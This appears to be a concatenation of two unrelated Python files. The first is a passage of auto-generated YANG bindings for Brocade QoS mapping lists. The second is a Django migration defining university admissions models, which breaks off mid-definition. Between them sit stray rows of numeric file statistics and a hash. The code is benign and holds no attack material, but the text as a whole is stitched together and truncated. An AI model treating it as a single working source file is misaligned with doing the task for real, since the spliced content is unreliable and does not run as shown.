t = YANGDynClass(v,base=YANGListType("name",cos_traffic_class.cos_traffic_class, yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}), is_container='list', yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """cos_traffic_class must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("name",cos_traffic_class.cos_traffic_class, yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}), is_container='list', yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)""",
})
self.__cos_traffic_class = t
if hasattr(self, '_set'):
self._set()
def _unset_cos_traffic_class(self):
self.__cos_traffic_class = YANGDynClass(base=YANGListType("name",cos_traffic_class.cos_traffic_class, yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}), is_container='list', yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
def _get_traffic_class_cos(self):
"""
Getter method for traffic_class_cos, mapped from YANG variable /qos/map/traffic_class_cos (list)
"""
return self.__traffic_class_cos
def _set_traffic_class_cos(self, v, load=False):
"""
Setter method for traffic_class_cos, mapped from YANG variable /qos/map/traffic_class_cos (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_traffic_class_cos is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_traffic_class_cos() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("traffic_class_cos_map_name",traffic_class_cos.traffic_class_cos, yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='traffic-class-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}), is_container='list', yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """traffic_class_cos must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("traffic_class_cos_map_name",traffic_class_cos.traffic_class_cos, yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='traffic-class-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}), is_container='list', yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)""",
})
self.__traffic_class_cos = t
if hasattr(self, '_set'):
self._set()
def _unset_traffic_class_cos(self):
self.__traffic_class_cos = YANGDynClass(base=YANGListType("traffic_class_cos_map_name",traffic_class_cos.traffic_class_cos, yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='traffic-class-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}), is_container='list', yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
def _get_dscp_mutation(self):
"""
Getter method for dscp_mutation, mapped from YANG variable /qos/map/dscp_mutation (list)
"""
return self.__dscp_mutation
def _set_dscp_mutation(self, v, load=False):
"""
Setter method for dscp_mutation, mapped from YANG variable /qos/map/dscp_mutation (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_dscp_mutation is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_dscp_mutation() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("dscp_mutation_map_name",dscp_mutation.dscp_mutation, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-mutation-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}), is_container='list', yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """dscp_mutation must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("dscp_mutation_map_name",dscp_mutation.dscp_mutation, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-mutation-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}), is_container='list', yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)""",
})
self.__dscp_mutation = t
if hasattr(self, '_set'):
self._set()
def _unset_dscp_mutation(self):
self.__dscp_mutation = YANGDynClass(base=YANGListType("dscp_mutation_map_name",dscp_mutation.dscp_mutation, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-mutation-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}), is_container='list', yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
def _get_dscp_traffic_class(self):
"""
Getter method for dscp_traffic_class, mapped from YANG variable /qos/map/dscp_traffic_class (list)
"""
return self.__dscp_traffic_class
def _set_dscp_traffic_class(self, v, load=False):
"""
Setter method for dscp_traffic_class, mapped from YANG variable /qos/map/dscp_traffic_class (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_dscp_traffic_class is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_dscp_traffic_class() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("dscp_traffic_class_map_name",dscp_traffic_class.dscp_traffic_class, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-traffic-class-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}), is_container='list', yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """dscp_traffic_class must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("dscp_traffic_class_map_name",dscp_traffic_class.dscp_traffic_class, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-traffic-class-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}), is_container='list', yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)""",
})
self.__dscp_traffic_class = t
if hasattr(self, '_set'):
self._set()
def _unset_dscp_traffic_class(self):
self.__dscp_traffic_class = YANGDynClass(base=YANGListType("dscp_traffic_class_map_name",dscp_traffic_class.dscp_traffic_class, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-traffic-class-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}), is_container='list', yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
def _get_dscp_cos(self):
"""
Getter method for dscp_cos, mapped from YANG variable /qos/map/dscp_cos (list)
"""
return self.__dscp_cos
def _set_dscp_cos(self, v, load=False):
"""
Setter method for dscp_cos, mapped from YANG variable /qos/map/dscp_cos (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_dscp_cos is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_dscp_cos() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("dscp_cos_map_name",dscp_cos.dscp_cos, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}), is_container='list', yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """dscp_cos must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("dscp_cos_map_name",dscp_cos.dscp_cos, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}), is_container='list', yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)""",
})
self.__dscp_cos = t
if hasattr(self, '_set'):
self._set()
def _unset_dscp_cos(self):
self.__dscp_cos = YANGDynClass(base=YANGListType("dscp_cos_map_name",dscp_cos.dscp_cos, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}), is_container='list', yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
cos_mutation = __builtin__.property(_get_cos_mutation, _set_cos_mutation)
cos_traffic_class = __builtin__.property(_get_cos_traffic_class, _set_cos_traffic_class)
traffic_class_cos = __builtin__.property(_get_traffic_class_cos, _set_traffic_class_cos)
dscp_mutation = __builtin__.property(_get_dscp_mutation, _set_dscp_mutation)
dscp_traffic_class = __builtin__.property(_get_dscp_traffic_class, _set_dscp_traffic_class)
dscp_cos = __builtin__.property(_get_dscp_cos, _set_dscp_cos)
_pyangbind_elements = {'cos_mutation': cos_mutation, 'cos_traffic_class': cos_traffic_class, 'traffic_class_cos': traffic_class_cos, 'dscp_mutation': dscp_mutation, 'dscp_traffic_class': dscp_traffic_class, 'dscp_cos': dscp_cos, }
| 125.279605
| 1,291
| 0.740029
| 5,937
| 38,085
| 4.55651
| 0.029645
| 0.039036
| 0.049682
| 0.05678
| 0.923703
| 0.90522
| 0.891912
| 0.890359
| 0.886589
| 0.884223
| 0
| 0.000174
| 0.093318
| 38,085
| 303
| 1,292
| 125.693069
| 0.783238
| 0.072496
| 0
| 0.453608
| 0
| 0.030928
| 0.522854
| 0.2413
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108247
| false
| 0
| 0.072165
| 0
| 0.298969
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c5f8ad45a5a715d8150932d38c7e245d91dff773
| 13,806
|
py
|
Python
|
src/university/migrations/0001_initial.py
|
Nikhilgupta18/practice-react_django
|
4226345a10c528308d13629907952e841621badc
|
[
"MIT"
] | null | null | null |
src/university/migrations/0001_initial.py
|
Nikhilgupta18/practice-react_django
|
4226345a10c528308d13629907952e841621badc
|
[
"MIT"
] | 11
|
2020-09-07T15:48:40.000Z
|
2022-03-08T23:06:16.000Z
|
src/university/migrations/0001_initial.py
|
Nikhilgupta18/practice-react_django
|
4226345a10c528308d13629907952e841621badc
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.5 on 2019-10-22 16:01
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='BusinessGrad',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('enrollment', models.IntegerField(blank=True, default=None, null=True)),
('international', models.FloatField(blank=True, default=None, null=True)),
('male', models.FloatField(blank=True, default=None, null=True)),
('female', models.FloatField(blank=True, default=None, null=True)),
('acceptance_rate_masters', models.FloatField(blank=True, default=None, null=True)),
('acceptance_rate_phd', models.FloatField(blank=True, default=None, null=True)),
('us_application_fee', models.IntegerField(blank=True, default=None, null=True)),
('int_application_fee', models.IntegerField(blank=True, default=None, null=True)),
('tuition', models.FloatField(blank=True, default=None, null=True)),
('us_deadline', models.DateTimeField(blank=True, default=None, null=True)),
('int_deadline', models.DateTimeField(blank=True, default=None, null=True)),
('rolling', models.BooleanField(default=False)),
('gpa', models.FloatField(blank=True, default=None, null=True)),
('min_toefl_score', models.IntegerField(blank=True, default=None, null=True)),
('mean_toefl_score', models.IntegerField(blank=True, default=None, null=True)),
('min_ielts_score', models.FloatField(blank=True, default=None, null=True)),
('fin_aid_director_name', models.TextField(blank=True, default=None, null=True)),
('fin_aid_director_phone', models.TextField(blank=True, default=None, null=True)),
('fellowships', models.IntegerField(blank=True, default=None, null=True)),
('teaching_assistantships', models.IntegerField(blank=True, default=None, null=True)),
('research_assistantships', models.IntegerField(blank=True, default=None, null=True)),
('living_expenses', models.IntegerField(blank=True, default=None, null=True)),
('employed', models.FloatField(blank=True, default=None, null=True)),
('employed_3_months', models.FloatField(blank=True, default=None, null=True)),
('avg_work_ex_months', models.IntegerField(blank=True, default=None, null=True)),
('gmat', models.IntegerField(blank=True, default=None, null=True)),
('avg_salary', models.IntegerField(blank=True, default=None, null=True)),
],
),
migrations.CreateModel(
name='EngineeringGrad',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('enrollment', models.IntegerField(blank=True, default=None, null=True)),
('us_application_fee', models.IntegerField(blank=True, default=None, null=True)),
('int_application_fee', models.IntegerField(blank=True, default=None, null=True)),
('international', models.FloatField(blank=True, default=None, null=True)),
('male', models.FloatField(blank=True, default=None, null=True)),
('female', models.FloatField(blank=True, default=None, null=True)),
('acceptance_rate_masters', models.FloatField(blank=True, default=None, null=True)),
('acceptance_rate_phd', models.FloatField(blank=True, default=None, null=True)),
('tuition', models.FloatField(blank=True, default=None, null=True)),
('us_deadline', models.DateTimeField(blank=True, default=None, null=True)),
('int_deadline', models.DateTimeField(blank=True, default=None, null=True)),
('rolling', models.BooleanField(default=False)),
('gpa', models.FloatField(blank=True, default=None, null=True)),
('min_toefl_score', models.IntegerField(blank=True, default=None, null=True)),
('mean_toefl_score', models.IntegerField(blank=True, default=None, null=True)),
('min_ielts_score', models.FloatField(blank=True, default=None, null=True)),
('fin_aid_director_name', models.TextField(blank=True, default=None, null=True)),
('fin_aid_director_phone', models.TextField(blank=True, default=None, null=True)),
('fellowships', models.IntegerField(blank=True, default=None, null=True)),
('teaching_assistantships', models.IntegerField(blank=True, default=None, null=True)),
('research_assistantships', models.IntegerField(blank=True, default=None, null=True)),
('living_expenses', models.IntegerField(blank=True, default=None, null=True)),
],
),
migrations.CreateModel(
name='GRE',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('verbal', models.IntegerField(blank=True, default=None, null=True)),
('quant', models.IntegerField(blank=True, default=None, null=True)),
('awa', models.FloatField(blank=True, default=None, null=True)),
],
),
migrations.CreateModel(
name='LawGrad',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('enrollment', models.IntegerField(blank=True, default=None, null=True)),
('international', models.FloatField(blank=True, default=None, null=True)),
('us_application_fee', models.IntegerField(blank=True, default=None, null=True)),
('int_application_fee', models.IntegerField(blank=True, default=None, null=True)),
('male', models.FloatField(blank=True, default=None, null=True)),
('female', models.FloatField(blank=True, default=None, null=True)),
('acceptance_rate', models.FloatField(blank=True, default=None, null=True)),
('tuition', models.FloatField(blank=True, default=None, null=True)),
('us_deadline', models.DateTimeField(blank=True, default=None, null=True)),
('int_deadline', models.DateTimeField(blank=True, default=None, null=True)),
('rolling', models.BooleanField(default=False)),
('int_rolling', models.BooleanField(default=False)),
('fin_aid_director_name', models.TextField(blank=True, default=None, null=True)),
('fin_aid_director_phone', models.TextField(blank=True, default=None, null=True)),
('students_receiving_aid', models.FloatField(blank=True, default=None, null=True)),
('gpa', models.FloatField(blank=True, default=None, null=True)),
('living_expenses', models.IntegerField(blank=True, default=None, null=True)),
('employed', models.FloatField(blank=True, default=None, null=True)),
('bar_passage_rate', models.FloatField(blank=True, default=None, null=True)),
('median_grant', models.IntegerField(blank=True, default=None, null=True)),
('lsat_score', models.IntegerField(blank=True, default=None, null=True)),
('median_public_salary', models.IntegerField(blank=True, default=None, null=True)),
('median_private_salary', models.IntegerField(blank=True, default=None, null=True)),
],
),
migrations.CreateModel(
name='MCAT',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('old_total', models.IntegerField(blank=True, default=None, null=True)),
('new_total', models.IntegerField(blank=True, default=None, null=True)),
('chemical_physical', models.IntegerField(blank=True, default=None, null=True)),
('critical_analysis', models.IntegerField(blank=True, default=None, null=True)),
('biologic_biochemical', models.IntegerField(blank=True, default=None, null=True)),
('psycho_social_biological', models.IntegerField(blank=True, default=None, null=True)),
],
),
migrations.CreateModel(
name='MedicineGrad',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('enrollment', models.IntegerField(blank=True, default=None, null=True)),
('international', models.FloatField(blank=True, default=None, null=True)),
('us_application_fee', models.IntegerField(blank=True, default=None, null=True)),
('int_application_fee', models.IntegerField(blank=True, default=None, null=True)),
('acceptance_rate_masters', models.FloatField(blank=True, default=None, null=True)),
('acceptance_rate_phd', models.FloatField(blank=True, default=None, null=True)),
('male', models.FloatField(blank=True, default=None, null=True)),
('female', models.FloatField(blank=True, default=None, null=True)),
('tuition', models.FloatField(blank=True, default=None, null=True)),
('us_deadline', models.DateTimeField(blank=True, default=None, null=True)),
('int_deadline', models.DateTimeField(blank=True, default=None, null=True)),
('rolling', models.BooleanField(default=False)),
('gpa', models.FloatField(blank=True, default=None, null=True)),
('fin_aid_director_name', models.TextField(blank=True, default=None, null=True)),
('fin_aid_director_phone', models.TextField(blank=True, default=None, null=True)),
('students_receiving_aid', models.FloatField(blank=True, default=None, null=True)),
('living_expenses', models.IntegerField(blank=True, default=None, null=True)),
('mcat', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='university.MCAT')),
],
),
migrations.CreateModel(
name='University',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(default=None)),
('info_link', models.TextField(default=None, null=True)),
('rank', models.IntegerField(blank=True, default=None, null=True)),
('total_students', models.IntegerField(blank=True, default=None, null=True)),
('total_int_students', models.IntegerField(blank=True, default=None, null=True)),
('address', models.TextField(blank=True, default=None, null=True)),
('website', models.TextField(blank=True, default=None, max_length=500, null=True)),
('schools', models.TextField(blank=True, default=None, null=True)),
('uni_type', models.TextField(blank=True, default=None, null=True)),
('grad_school_link', models.TextField(blank=True, default=None, max_length=500, null=True)),
('undergrad_link', models.TextField(blank=True, default=None, max_length=500, null=True)),
('business_link', models.TextField(blank=True, default=None, max_length=500, null=True)),
('med_link', models.TextField(blank=True, default=None, max_length=500, null=True)),
('law_link', models.TextField(blank=True, default=None, max_length=500, null=True)),
('engg_link', models.TextField(blank=True, default=None, max_length=500, null=True)),
('slug', models.SlugField(blank=True, default=None, max_length=500, null=True)),
